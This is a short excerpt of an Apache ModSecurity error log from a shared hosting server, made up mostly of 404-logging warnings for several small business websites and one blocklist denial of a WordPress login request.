[Tue May 26 15:28:56.382688 2026] [security2:error] [pid 715645:tid 715832] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu4HVGgMGh8k213Rj67gAAADk"]
[Tue May 26 15:28:57.029871 2026] [security2:error] [pid 715645:tid 715678] [remote 103.50.205.131:58528] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.205.50.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVu4HVGgMGh8k213Rj7AAAAeiA"]
[Tue May 26 15:28:57.106238 2026] [security2:error] [pid 715645:tid 715863] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu4XVGgMGh8k213Rj7CwAAAFg"]
[Tue May 26 15:28:57.327707 2026] [security2:error] [pid 715645:tid 715900] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVu4HVGgMGh8k213Rj7BAAAAH0"]
[Tue May 26 15:28:57.456441 2026] [security2:error] [pid 715645:tid 715781] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu4XVGgMGh8k213Rj7HQAAAAY"]
[Tue May 26 15:28:57.943602 2026] [security2:error] [pid 715645:tid 715819] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu4XVGgMGh8k213Rj7NgAAACw"]
[Tue May 26 15:28:58.017957 2026] [security2:error] [pid 715645:tid 715812] [client 80.116.222.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVu4XVGgMGh8k213Rj7KAAAACU"]
[Tue May 26 15:28:58.387718 2026] [security2:error] [pid 715645:tid 715889] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu4nVGgMGh8k213Rj7TAAAAHI"]
[Tue May 26 15:28:58.729413 2026] [security2:error] [pid 715645:tid 715846] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu4nVGgMGh8k213Rj7dwAAAEc"]
[Tue May 26 15:28:59.081811 2026] [security2:error] [pid 715645:tid 715839] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu4nVGgMGh8k213Rj7iAAAAEA"]
[Tue May 26 15:28:59.625570 2026] [security2:error] [pid 715645:tid 715850] [client 91.230.225.132:59703] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu43VGgMGh8k213Rj7uwAAAEs"]
[Tue May 26 15:28:59.737975 2026] [security2:error] [pid 715645:tid 715792] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVu43VGgMGh8k213Rj7tgAAABE"]
[Tue May 26 15:28:59.968411 2026] [security2:error] [pid 715645:tid 715800] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu43VGgMGh8k213Rj7xwAAGWk"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:28:59.968766 2026] [security2:error] [pid 715645:tid 715758] [remote 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu43VGgMGh8k213Rj7xAAAZXA"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:28:59.968941 2026] [security2:error] [pid 715645:tid 715802] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu43VGgMGh8k213Rj7wAAAG28"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:28:59.969193 2026] [security2:error] [pid 715645:tid 715886] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu43VGgMGh8k213Rj7xQAAb24"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:28:59.969513 2026] [security2:error] [pid 715645:tid 715859] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu43VGgMGh8k213Rj7wQAAVAY"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:28:59.979830 2026] [security2:error] [pid 715645:tid 715803] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu43VGgMGh8k213Rj7wwAAHFw"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.045118 2026] [security2:error] [pid 715645:tid 715780] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu43VGgMGh8k213Rj7zgAAAAU"]
[Tue May 26 15:29:00.142666 2026] [security2:error] [pid 715645:tid 715798] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj73wAAF2U"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.218980 2026] [security2:error] [pid 715645:tid 715801] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj71gAAGmw"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.220508 2026] [security2:error] [pid 715645:tid 715789] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj75wAADho"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.227940 2026] [security2:error] [pid 715645:tid 715778] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj71wAAA3M"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.230337 2026] [security2:error] [pid 715645:tid 715788] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj74AAADRQ"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.235214 2026] [security2:error] [pid 715645:tid 715898] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj72AAAexk"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.238886 2026] [security2:error] [pid 715645:tid 715847] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj75QAASHI"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.246983 2026] [security2:error] [pid 715645:tid 715820] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj70gAALQw"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.247969 2026] [security2:error] [pid 715645:tid 715794] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj74gAAExY"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.266955 2026] [security2:error] [pid 715645:tid 715795] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj73AAAFGQ"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.275329 2026] [security2:error] [pid 715645:tid 715846] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj78wAARxw"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.276413 2026] [security2:error] [pid 715645:tid 715899] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj71QAAfAg"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.284680 2026] [security2:error] [pid 715645:tid 715775] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj70QAAAAs"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.302148 2026] [security2:error] [pid 715645:tid 715796] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj73QAAFQo"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.302424 2026] [security2:error] [pid 715645:tid 715866] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj7zwAAWwk"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.304465 2026] [security2:error] [pid 715645:tid 715659] [remote 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj77QAAHg0"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.316818 2026] [security2:error] [pid 715645:tid 715857] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj79AAAUiA"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.317987 2026] [security2:error] [pid 715645:tid 715885] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj72gAAbmE"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.319877 2026] [security2:error] [pid 715645:tid 715845] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj70AAARm0"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.323453 2026] [security2:error] [pid 715645:tid 715825] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj71AAAMms"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.348804 2026] [security2:error] [pid 715645:tid 715881] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj74QAAamc"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.349173 2026] [security2:error] [pid 715645:tid 715784] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj7-gAACSs"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.370838 2026] [security2:error] [pid 715645:tid 715861] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj70wAAVnE"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.385183 2026] [security2:error] [pid 715645:tid 715835] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj77wAAPCo"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.388938 2026] [security2:error] [pid 715645:tid 715813] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj78AAAJhs"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.389000 2026] [security2:error] [pid 715645:tid 715874] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj72wAAYxM"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.390654 2026] [security2:error] [pid 715645:tid 715793] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj72QAAEg4"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.390951 2026] [security2:error] [pid 715645:tid 715878] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj74wAAZwc"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.391266 2026] [security2:error] [pid 715645:tid 715837] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj77gAAPh8"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.393139 2026] [security2:error] [pid 715645:tid 715862] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj75gAAVxI"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.394496 2026] [security2:error] [pid 715645:tid 715840] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj77AAAQRU"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.395148 2026] [security2:error] [pid 715645:tid 715834] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj7-wAAOy0"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.398875 2026] [security2:error] [pid 715645:tid 715669] [remote 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj73gAAKBc"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.399500 2026] [security2:error] [pid 715645:tid 715864] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj8DAAAWTQ"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.403425 2026] [security2:error] [pid 715645:tid 715902] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj79wAAf2A"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
